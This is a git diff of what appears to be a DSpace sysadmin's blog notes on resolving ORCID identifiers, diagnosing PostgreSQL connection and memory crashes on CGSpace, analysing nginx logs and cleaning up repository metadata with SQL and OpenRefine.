File &#34;./resolve-orcids.py&#34;, line 65, in resolve_orcid_identifiers
family_name = data[&#39;name&#39;][&#39;family-name&#39;][&#39;value&#39;]
TypeError: &#39;NoneType&#39; object is not subscriptable
</code></pre><ul>
<li>According to ORCID that identifier&rsquo;s family-name is null so that sucks</li>
<li>I fixed the script so that it checks if the family name is null</li>
<li>Now another:</li>
</ul>
<pre><code>Looking up the name associated with ORCID iD: 0000-0002-1300-3636
<pre tabindex="0"><code>Looking up the name associated with ORCID iD: 0000-0002-1300-3636
Traceback (most recent call last):
File &quot;./resolve-orcids.py&quot;, line 117, in &lt;module&gt;
File &#34;./resolve-orcids.py&#34;, line 117, in &lt;module&gt;
read_identifiers_from_file()
File &quot;./resolve-orcids.py&quot;, line 37, in read_identifiers_from_file
File &#34;./resolve-orcids.py&#34;, line 37, in read_identifiers_from_file
resolve_orcid_identifiers(orcids)
File &quot;./resolve-orcids.py&quot;, line 65, in resolve_orcid_identifiers
if data['name']['given-names']:
TypeError: 'NoneType' object is not subscriptable
File &#34;./resolve-orcids.py&#34;, line 65, in resolve_orcid_identifiers
if data[&#39;name&#39;][&#39;given-names&#39;]:
TypeError: &#39;NoneType&#39; object is not subscriptable
</code></pre><ul>
<li>According to ORCID that identifier&rsquo;s entire name block is null!</li>
</ul>
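<ul>
<li>For reference, the kind of null checking the script ended up needing looks roughly like this (an illustrative sketch against ORCID&rsquo;s public v2.1 API, not the actual resolve-orcids.py):</li>
</ul>
<pre tabindex="0"><code>#!/usr/bin/env python3
# Illustrative sketch of null-safe name resolution against ORCID's public
# v2.1 API; not the actual resolve-orcids.py.
import requests

def resolve_orcid(orcid):
    url = f'https://pub.orcid.org/v2.1/{orcid}/person'
    data = requests.get(url, headers={'Accept': 'application/json'}).json()
    name = data.get('name')
    if name is None:
        return None  # the entire name block is null, eg 0000-0002-1300-3636
    given = name.get('given-names')
    family = name.get('family-name')  # null for 0000-0001-9634-1958
    given = given['value'] if given else ''
    family = family['value'] if family else ''
    return f'{given} {family}'.strip() or None

print(resolve_orcid('0000-0001-5019-1368'))  # Ali Ramadhan
</code></pre>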
@ -722,14 +721,14 @@ TypeError: 'NoneType' object is not subscriptable
<li>Discuss some of the issues with null values and poor-quality names in some ORCID identifiers with Abenet and I think we&rsquo;ll now only use ORCID iDs that have been sent to us by partners, not those extracted via keyword searches on orcid.org</li>
<li>This should be the version we use (the existing controlled vocabulary generated from CGSpace&rsquo;s Solr authority core plus the IDs sent to us so far by partners):</li>
</ul>
<pre><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; 2018-02-20-combined.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI.csv | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; 2018-02-20-combined.txt
</code></pre><ul>
<li>I updated the <code>resolve-orcids.py</code> to use the &ldquo;credit-name&rdquo; if it exists in a profile, falling back to &ldquo;given-names&rdquo; + &ldquo;family-name&rdquo;</li>
<li>Also, I added color-coded output to the debug messages and added a &ldquo;quiet&rdquo; mode that suppresses the normal behavior of printing results to the screen</li>
<li>I&rsquo;m using this as the test input for <code>resolve-orcids.py</code>:</li>
</ul>
<pre><code>$ cat orcid-test-values.txt
# valid identifier with 'given-names' and 'family-name'
<pre tabindex="0"><code>$ cat orcid-test-values.txt
# valid identifier with &#39;given-names&#39; and &#39;family-name&#39;
0000-0001-5019-1368
# duplicate identifier
@ -738,16 +737,16 @@ TypeError: 'NoneType' object is not subscriptable
# invalid identifier
0000-0001-9634-19580
# has a 'credit-name' value we should prefer
# has a &#39;credit-name&#39; value we should prefer
0000-0002-1735-7458
# has a blank 'credit-name' value
# has a blank &#39;credit-name&#39; value
0000-0001-5199-5528
# has a null 'name' object
# has a null &#39;name&#39; object
0000-0002-1300-3636
# has a null 'family-name' value
# has a null &#39;family-name&#39; value
0000-0001-9634-1958
# missing ORCID identifier
@ -770,7 +769,7 @@ TypeError: 'NoneType' object is not subscriptable
<li>It looks like Sisay restarted Tomcat because I was offline</li>
<li>There was absolutely nothing interesting going on at 13:00 on the server, WTF?</li>
</ul>
<pre><code># cat /var/log/nginx/*.log | grep -E &quot;22/Feb/2018:13&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># cat /var/log/nginx/*.log | grep -E &#34;22/Feb/2018:13&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
55 192.99.39.235
60 207.46.13.26
62 40.77.167.38
@ -784,7 +783,7 @@ TypeError: 'NoneType' object is not subscriptable
</code></pre><ul>
<li>Otherwise there was pretty normal traffic the rest of the day:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;22/Feb/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;22/Feb/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
839 216.244.66.245
1074 68.180.228.117
1114 157.55.39.100
@ -798,16 +797,16 @@ TypeError: 'NoneType' object is not subscriptable
</code></pre><ul>
<li>So I don&rsquo;t see any definite cause for this crash, but I do see a shit ton of abandoned PostgreSQL connections today around 1PM!</li>
</ul>
<pre><code># grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39; /var/log/tomcat7/catalina.out
729
# grep 'Feb 22, 2018 1' /var/log/tomcat7/catalina.out | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
# grep &#39;Feb 22, 2018 1&#39; /var/log/tomcat7/catalina.out | grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39;
519
</code></pre><ul>
<li>I think the <code>removeAbandonedTimeout</code> might still be too low (I increased it from 60 to 90 seconds last week)</li>
<li>Abandoned connections are not a cause but a symptom, though perhaps something more like a few minutes would be better?</li>
<li>Also, while looking at the logs I see some new bot:</li>
</ul>
<pre><code>Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.4.2661.102 Safari/537.36; 360Spider
<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.4.2661.102 Safari/537.36; 360Spider
</code></pre><ul>
<li>It seems to re-use its user agent but makes tons of useless requests and I wonder if I should add &ldquo;.*spider.*&rdquo; to the Tomcat Crawler Session Manager valve?</li>
</ul>
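<ul>
<li>A quick way to sanity-check a candidate pattern against the user agents seen in the logs (the regular expression here is only a guess at what the valve&rsquo;s crawlerUserAgents value could look like, not its actual default):</li>
</ul>
<pre tabindex="0"><code>#!/usr/bin/env python3
# Sketch: test a candidate crawler pattern against user agents from the logs.
# The pattern is a guess, not the valve's actual default configuration.
import re

crawler_pattern = re.compile(r'.*[bB]ot.*|.*[sS]pider.*')

user_agents = [
    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '
    'Chrome/50.4.2661.102 Safari/537.36; 360Spider',
    'BUbiNG (+http://law.di.unimi.it/BUbiNG.html)',  # note: not caught by this pattern
]
for agent in user_agents:
    print(bool(crawler_pattern.match(agent)), agent)
</code></pre>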
@ -820,19 +819,19 @@ TypeError: 'NoneType' object is not subscriptable
<li>A few days ago Abenet sent me the list of ORCID iDs from CCAFS</li>
<li>We currently have 988 unique identifiers:</li>
</ul>
<pre><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
988
</code></pre><ul>
<li>After adding the ones from CCAFS we now have 1004:</li>
</ul>
<pre><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ccafs | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ccafs | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
1004
</code></pre><ul>
<li>I will add them to DSpace Test but Abenet says she&rsquo;s still waiting to send us ILRI&rsquo;s list</li>
<li>I will tell her that we should proceed on sharing our work on DSpace Test with the partners this week anyways and we can update the list later</li>
<li>While regenerating the names for these ORCID identifiers I saw <a href="https://pub.orcid.org/v2.1/0000-0002-2614-426X/person">one that has a weird value for its names</a>:</li>
</ul>
<pre><code>Looking up the names associated with ORCID iD: 0000-0002-2614-426X
<pre tabindex="0"><code>Looking up the names associated with ORCID iD: 0000-0002-2614-426X
Given Names Deactivated Family Name Deactivated: 0000-0002-2614-426X
</code></pre><ul>
<li>I don&rsquo;t know if the user accidentally entered this as their name or if that&rsquo;s how ORCID behaves when the name is private?</li>
@ -843,7 +842,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0002-2614-426X
<li>Thinking about how to preserve ORCID identifiers attached to existing items in CGSpace</li>
<li>We have over 60,000 unique author + authority combinations on CGSpace:</li>
</ul>
<pre><code>dspace=# select count(distinct (text_value, authority)) from metadatavalue where resource_type_id=2 and metadata_field_id=3;
<pre tabindex="0"><code>dspace=# select count(distinct (text_value, authority)) from metadatavalue where resource_type_id=2 and metadata_field_id=3;
count
-------
62464
@ -853,7 +852,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0002-2614-426X
<li>The query in Solr would simply be <code>orcid_id:*</code></li>
<li>Assuming I know that authority record with <code>id:d7ef744b-bbd4-4171-b449-00e37e1b776f</code>, then I could query PostgreSQL for all metadata records using that authority:</li>
</ul>
<pre><code>dspace=# select * from metadatavalue where resource_type_id=2 and authority='d7ef744b-bbd4-4171-b449-00e37e1b776f';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and authority=&#39;d7ef744b-bbd4-4171-b449-00e37e1b776f&#39;;
metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place | authority | confidence | resource_type_id
-------------------+-------------+-------------------+---------------------------+-----------+-------+--------------------------------------+------------+------------------
2726830 | 77710 | 3 | Rodríguez Chalarca, Jairo | | 2 | d7ef744b-bbd4-4171-b449-00e37e1b776f | 600 | 2
@ -862,13 +861,13 @@ Given Names Deactivated Family Name Deactivated: 0000-0002-2614-426X
<li>Then I suppose I can use the <code>resource_id</code> to identify the item?</li>
<li>Actually, <code>resource_id</code> is the same id we use in CSV, so I could simply build something like this for a metadata import!</li>
</ul>
<pre><code>id,cg.creator.id
<pre tabindex="0"><code>id,cg.creator.id
93848,Alan S. Orth: 0000-0002-1735-7458||Peter G. Ballantyne: 0000-0001-9346-2893
</code></pre><ul>
<li>I just discovered that <a href="https://requests-cache.readthedocs.io">requests-cache</a> can transparently cache HTTP requests</li>
<li>Running <code>resolve-orcids.py</code> with my test input takes 10.5 seconds the first time, and then 3.0 seconds the second time!</li>
</ul>
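<ul>
<li>Enabling it is essentially a one-liner; a minimal sketch (the cache name and expiry are arbitrary choices), after which the timing below shows the effect of the warm cache:</li>
</ul>
<pre tabindex="0"><code>#!/usr/bin/env python3
# Minimal sketch: transparently cache ORCID API responses with requests-cache.
# The cache name and expiry are arbitrary choices.
import requests
import requests_cache

requests_cache.install_cache('orcid-cache', expire_after=86400)

# Identical GETs after the first are served from the local cache
url = 'https://pub.orcid.org/v2.1/0000-0002-1735-7458/person'
response = requests.get(url, headers={'Accept': 'application/json'})
print(response.from_cache)  # False on the first call, True afterwards
</code></pre>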
<pre><code>$ time ./resolve-orcids.py -i orcid-test-values.txt -o /tmp/orcid-names
<pre tabindex="0"><code>$ time ./resolve-orcids.py -i orcid-test-values.txt -o /tmp/orcid-names
Ali Ramadhan: 0000-0001-5019-1368
Alan S. Orth: 0000-0002-1735-7458
Ibrahim Mohammed: 0000-0001-5199-5528
@ -896,28 +895,28 @@ Nor Azwadi: 0000-0001-9634-1958
<li>I need to see which SQL queries are run during that time</li>
<li>And only a few hours after I disabled the <code>removeAbandoned</code> thing CGSpace went down and lo and behold, there were 264 connections, most of which were idle:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
279 dspaceWeb
$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c &quot;idle in transaction&quot;
$ psql -c &#39;select * from pg_stat_activity&#39; | grep dspaceWeb | grep -c &#34;idle in transaction&#34;
218
</code></pre><ul>
<li>So I&rsquo;m re-enabling the <code>removeAbandoned</code> setting</li>
<li>I grabbed a snapshot of the active connections in <code>pg_stat_activity</code> for all queries running longer than 2 minutes:</li>
</ul>
<pre><code>dspace=# \copy (SELECT now() - query_start as &quot;runtime&quot;, application_name, usename, datname, waiting, state, query
<pre tabindex="0"><code>dspace=# \copy (SELECT now() - query_start as &#34;runtime&#34;, application_name, usename, datname, waiting, state, query
FROM pg_stat_activity
WHERE now() - query_start &gt; '2 minutes'::interval
WHERE now() - query_start &gt; &#39;2 minutes&#39;::interval
ORDER BY runtime DESC) to /tmp/2018-02-27-postgresql.txt
COPY 263
</code></pre><ul>
<li>100 of these idle in transaction connections are the following query:</li>
</ul>
<pre><code>SELECT * FROM resourcepolicy WHERE resource_type_id= $1 AND resource_id= $2 AND action_id= $3
<pre tabindex="0"><code>SELECT * FROM resourcepolicy WHERE resource_type_id= $1 AND resource_id= $2 AND action_id= $3
</code></pre><ul>
<li>&hellip; but according to the <a href="https://www.postgresql.org/docs/9.5/static/view-pg-locks.html">pg_locks documentation</a> I should have done this to correlate the locks with the activity:</li>
</ul>
<pre><code>SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;
<pre tabindex="0"><code>SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;
</code></pre><ul>
<li>Tom Desair from Atmire shared some extra JDBC pool parameters that might be useful on my thread on the dspace-tech mailing list:
<ul>
@ -936,7 +935,7 @@ COPY 263
<li>CGSpace crashed today, the first HTTP 499 in nginx&rsquo;s access.log was around 09:12</li>
<li>There&rsquo;s nothing interesting going on in nginx&rsquo;s logs around that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;28/Feb/2018:09:&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;28/Feb/2018:09:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
65 197.210.168.174
74 213.55.99.121
74 66.249.66.90
@ -950,12 +949,12 @@ COPY 263
</code></pre><ul>
<li>Looking in dspace.log-2018-02-28 I see this, though:</li>
</ul>
<pre><code>2018-02-28 09:19:29,692 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
<pre tabindex="0"><code>2018-02-28 09:19:29,692 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>Memory issues seem to be common this month:</li>
</ul>
<pre><code>$ grep -c 'nested exception is java.lang.OutOfMemoryError: Java heap space' dspace.log.2018-02-*
<pre tabindex="0"><code>$ grep -c &#39;nested exception is java.lang.OutOfMemoryError: Java heap space&#39; dspace.log.2018-02-*
dspace.log.2018-02-01:0
dspace.log.2018-02-02:0
dspace.log.2018-02-03:0
@ -987,7 +986,7 @@ dspace.log.2018-02-28:1
</code></pre><ul>
<li>Top ten users by session during the first twenty minutes of 9AM:</li>
</ul>
<pre><code>$ grep -E '2018-02-28 09:(0|1)' dspace.log.2018-02-28 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code>$ grep -E &#39;2018-02-28 09:(0|1)&#39; dspace.log.2018-02-28 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq -c | sort -n | tail -n 10
18 session_id=F2DFF64D3D707CD66AE3A873CEC80C49
19 session_id=92E61C64A79F0812BE62A3882DA8F4BA
21 session_id=57417F5CB2F9E3871E609CEEBF4E001F
@ -1006,13 +1005,13 @@ dspace.log.2018-02-28:1
<li>I think I&rsquo;ll increase the JVM heap size on CGSpace from 6144m to 8192m because I&rsquo;m sick of this random crashing shit and the server has memory and I&rsquo;d rather eliminate this so I can get back to solving PostgreSQL issues and doing other real work</li>
<li>Run the few corrections from earlier this month for sponsor on CGSpace:</li>
</ul>
<pre><code>cgspace=# update metadatavalue set text_value='United States Agency for International Development' where resource_type_id=2 and metadata_field_id=29 and text_value like '%U.S. Agency for International Development%';
<pre tabindex="0"><code>cgspace=# update metadatavalue set text_value=&#39;United States Agency for International Development&#39; where resource_type_id=2 and metadata_field_id=29 and text_value like &#39;%U.S. Agency for International Development%&#39;;
UPDATE 3
</code></pre><ul>
<li>I finally got a CGIAR account so I logged into CGSpace with it and tried to delete my old unfinished submissions (22 of them)</li>
<li>Eventually it succeeded, but it took about five minutes and I noticed LOTS of locks happening with this query:</li>
</ul>
<pre><code>dspace=# \copy (SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid) to /tmp/locks-aorth.txt;
<pre tabindex="0"><code>dspace=# \copy (SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid) to /tmp/locks-aorth.txt;
</code></pre><ul>
<li>I took a few snapshots during the process and noticed 500, 800, and even 2000 locks at certain times during the process</li>
<li>Afterwards I looked a few times and saw only 150 or 200 locks</li>
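<li>Taking those snapshots could also be automated; a rough sketch (interval and iteration count are arbitrary; assumes local psycopg2 access with the placeholder credentials used in these notes):</li>
</ul>
<pre tabindex="0"><code>#!/usr/bin/env python3
# Rough sketch: periodically count locks per application using the same
# pg_locks/pg_stat_activity join as above. Credentials are placeholders.
import time
import psycopg2

conn = psycopg2.connect(dbname='dspace', user='dspace', password='fuuu')
conn.autocommit = True  # avoid holding our own idle transaction open
cur = conn.cursor()
for _ in range(10):
    cur.execute("""
        SELECT psa.application_name, count(*)
          FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid
         GROUP BY psa.application_name
    """)
    print(time.strftime('%H:%M:%S'), dict(cur.fetchall()))
    time.sleep(30)
</code></pre>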

View File

@ -24,7 +24,7 @@ Export a CSV of the IITA community metadata for Martin Mueller
Export a CSV of the IITA community metadata for Martin Mueller
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -54,12 +54,12 @@ Export a CSV of the IITA community metadata for Martin Mueller
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -105,7 +105,7 @@ Export a CSV of the IITA community metadata for Martin Mueller
<p class="blog-post-meta">
<time datetime="2018-03-02T16:07:54+02:00">Fri Mar 02, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -122,8 +122,8 @@ Export a CSV of the IITA community metadata for Martin Mueller
<li>There were some records using a non-breaking space in their AGROVOC subject field</li>
<li>I checked and tested some author corrections from Peter from last week, and then applied them on CGSpace</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i Correct-309-authors-2018-03-06.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
$ ./delete-metadata-values.py -i Delete-3-Authors-2018-03-06.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-309-authors-2018-03-06.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3
$ ./delete-metadata-values.py -i Delete-3-Authors-2018-03-06.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3
</code></pre><ul>
<li>This time there were no errors in whitespace but I did have to correct one incorrectly encoded accent character</li>
<li>Add new CRP subject &ldquo;GRAIN LEGUMES AND DRYLAND CEREALS&rdquo; to <code>input-forms.xml</code> (<a href="https://github.com/ilri/DSpace/pull/358">#358</a>)</li>
@ -132,16 +132,16 @@ $ ./delete-metadata-values.py -i Delete-3-Authors-2018-03-06.csv -db dspace -u d
<li>Run all system updates on DSpace Test and reboot server</li>
<li>I ran the <a href="https://gist.github.com/alanorth/24d8081a5dc25e2a4e27e548e7e2389c">orcid-authority-to-item.py</a> script on CGSpace and mapped 2,864 ORCID identifiers from Solr to item metadata</li>
</ul>
<pre><code>$ ./orcid-authority-to-item.py -db dspace -u dspace -p 'fuuu' -s http://localhost:8081/solr -d
<pre tabindex="0"><code>$ ./orcid-authority-to-item.py -db dspace -u dspace -p &#39;fuuu&#39; -s http://localhost:8081/solr -d
</code></pre><ul>
<li>I ran the DSpace cleanup script on CGSpace and it threw an error (as always):</li>
</ul>
<pre><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(150659) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(150659) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (150659);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (150659);&#39;
UPDATE 1
</code></pre><ul>
<li>Apply the proposed PostgreSQL indexes from DS-3636 (pull request <a href="https://github.com/DSpace/DSpace/pull/1791/">#1791</a>) on CGSpace (linode18)</li>
@ -159,7 +159,7 @@ UPDATE 1
<li>This makes the CSV have tons of columns, for example <code>dc.title</code>, <code>dc.title[]</code>, <code>dc.title[en]</code>, <code>dc.title[eng]</code>, <code>dc.title[en_US]</code> and so on!</li>
<li>I think I can fix (or at least normalize) them in the database:</li>
</ul>
<pre><code>dspace=# select distinct text_lang from metadatavalue where resource_type_id=2;
<pre tabindex="0"><code>dspace=# select distinct text_lang from metadatavalue where resource_type_id=2;
text_lang
-----------
@ -180,7 +180,7 @@ UPDATE 1
es
(16 rows)
dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and text_lang in ('en','EN','En','en_','EN_US','en_U','eng');
dspace=# update metadatavalue set text_lang=&#39;en_US&#39; where resource_type_id=2 and text_lang in (&#39;en&#39;,&#39;EN&#39;,&#39;En&#39;,&#39;en_&#39;,&#39;EN_US&#39;,&#39;en_U&#39;,&#39;eng&#39;);
UPDATE 122227
dspacetest=# select distinct text_lang from metadatavalue where resource_type_id=2;
text_lang
@ -199,7 +199,7 @@ dspacetest=# select distinct text_lang from metadatavalue where resource_type_id
<li>On second inspection it looks like <code>dc.description.provenance</code> fields use the text_lang &ldquo;en&rdquo; so that&rsquo;s probably why there are over 100,000 fields changed&hellip;</li>
<li>If I skip that, there are about 2,000, which seems more reasonably like the amount of fields users have edited manually, or fucked up during CSV import, etc:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and text_lang in ('EN','En','en_','EN_US','en_U','eng');
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=&#39;en_US&#39; where resource_type_id=2 and text_lang in (&#39;EN&#39;,&#39;En&#39;,&#39;en_&#39;,&#39;EN_US&#39;,&#39;en_U&#39;,&#39;eng&#39;);
UPDATE 2309
</code></pre><ul>
<li>I will apply this on CGSpace right now</li>
@ -207,20 +207,20 @@ UPDATE 2309
<li>Using a series of filters, flags, and GREL expressions to isolate items for a certain author, I figured out how to add ORCID identifiers to the <code>cg.creator.id</code> field</li>
<li>For example, a GREL expression in a custom text facet to get all items with <code>dc.contributor.author[en_US]</code> of a certain author with several name variations (this is how you use a logical OR in OpenRefine):</li>
</ul>
<pre><code>or(value.contains('Ceballos, Hern'), value.contains('Hernández Ceballos'))
<pre tabindex="0"><code>or(value.contains(&#39;Ceballos, Hern&#39;), value.contains(&#39;Hernández Ceballos&#39;))
</code></pre><ul>
<li>Then you can flag or star matching items and then use a conditional to either set the value directly or add it to an existing value:</li>
</ul>
<pre><code>if(isBlank(value), &quot;Hernan Ceballos: 0000-0002-8744-7918&quot;, value + &quot;||Hernan Ceballos: 0000-0002-8744-7918&quot;)
<pre tabindex="0"><code>if(isBlank(value), &#34;Hernan Ceballos: 0000-0002-8744-7918&#34;, value + &#34;||Hernan Ceballos: 0000-0002-8744-7918&#34;)
</code></pre><ul>
<li>One thing that bothers me is that this won&rsquo;t honor author order</li>
<li>It might be better to do batches of these in PostgreSQL with a script that takes the <code>place</code> column of an author into account when setting the <code>cg.creator.id</code></li>
<li>I wrote a Python script to read the author names and ORCID identifiers from CSV and create matching <code>cg.creator.id</code> fields: <a href="https://gist.github.com/alanorth/a49d85cd9c5dea89cddbe809813a7050">add-orcid-identifiers-csv.py </a></li>
<li>The CSV should have two columns: author name and ORCID identifier:</li>
</ul>
<pre><code>dc.contributor.author,cg.creator.id
&quot;Orth, Alan&quot;,Alan S. Orth: 0000-0002-1735-7458
&quot;Orth, A.&quot;,Alan S. Orth: 0000-0002-1735-7458
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&#34;Orth, Alan&#34;,Alan S. Orth: 0000-0002-1735-7458
&#34;Orth, A.&#34;,Alan S. Orth: 0000-0002-1735-7458
</code></pre><ul>
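<li>A rough sketch of the place-aware idea (not the actual gist; the sequence name and connection details are assumptions): for every author row matching a name in the CSV, insert a <code>cg.creator.id</code> value on the same item with the same <code>place</code> so that author order is preserved:</li>
</ul>
<pre tabindex="0"><code>#!/usr/bin/env python
# Hypothetical sketch of place-aware ORCID tagging from a two-column CSV.
import csv
import psycopg2

conn = psycopg2.connect('dbname=dspace user=dspace password=fuuu host=localhost')
cursor = conn.cursor()

with open('orcids.csv') as f:
    for row in csv.DictReader(f):
        # find items where this exact author name appears (field 3 = dc.contributor.author)
        cursor.execute(
            'SELECT resource_id, place FROM metadatavalue '
            'WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value=%s',
            (row['dc.contributor.author'],),
        )
        for resource_id, place in cursor.fetchall():
            # field 240 is cg.creator.id on this DSpace; re-use the author's place
            # (the sequence name metadatavalue_seq is an assumption)
            cursor.execute(
                'INSERT INTO metadatavalue (metadata_value_id, resource_id, '
                'resource_type_id, metadata_field_id, text_value, place) '
                "VALUES (nextval('metadatavalue_seq'), %s, 2, 240, %s, %s)",
                (resource_id, row['cg.creator.id'], place),
            )

conn.commit()
conn.close()
</code></pre><ul>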
<li>I didn&rsquo;t integrate the ORCID API lookup for author names in this script for now because I was only interested in &ldquo;tagging&rdquo; old items for a few given authors</li>
<li>I added ORCID identifiers for 187 items by CIAT&rsquo;s Hernan Ceballos, because that is what Elizabeth was trying to do manually!</li>
@ -236,14 +236,14 @@ UPDATE 2309
<li>Peter also wrote to say he is having issues with the Atmire Listings and Reports module</li>
<li>When I logged in to try it I get a blank white page after continuing and I see this in dspace.log.2018-03-11:</li>
</ul>
